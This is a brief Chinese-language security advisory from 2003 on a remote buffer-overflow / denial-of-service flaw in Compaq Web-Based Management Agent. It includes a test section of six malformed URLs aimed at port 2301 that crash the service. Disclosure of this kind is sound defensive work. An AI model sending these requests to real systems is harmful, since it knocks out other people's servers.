Compaq基于Web管理代理远程缓冲区溢出漏洞发布时间:2003-06-23 更新时间:2003-06-23 严重程度:高 威胁程度:远程拒绝服务 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:8014 受影响系统 Compaq Web-Based Management Agent详细描述 Compaq基于Web管理代理实现上存在一个远程拒绝服务漏洞,当攻击者向服务器提交一个畸形的请求,会导致服务器报告发生缓冲区溢出,此漏洞可能是因为空指针的废弃操作引起的,是否可被利用来执行任意指令还未知。 测试代码 http://www.example.com:2301/survey/<!> http://www.example.com:2301/<!.StringRedirecturl> http://www.example.com:2301/<!.StringHttpRequest=Url> http://www.example.com:2301/survey/<!.StringHttpRequest=Url> http://www.example.com:2301/<!.ObjectIsapiECB> http://www.example.com:2301/<!.StringIsapiECB=lpszPathInfo> 解决方案 厂商还未提供解决方案。 相关信息 Ian Vitek <ian.vitek@as5-5-7.bi.s.bonet.se> Management Agents Homepage http://h18000.www1.hp.com/products/servers/management/agents.html |
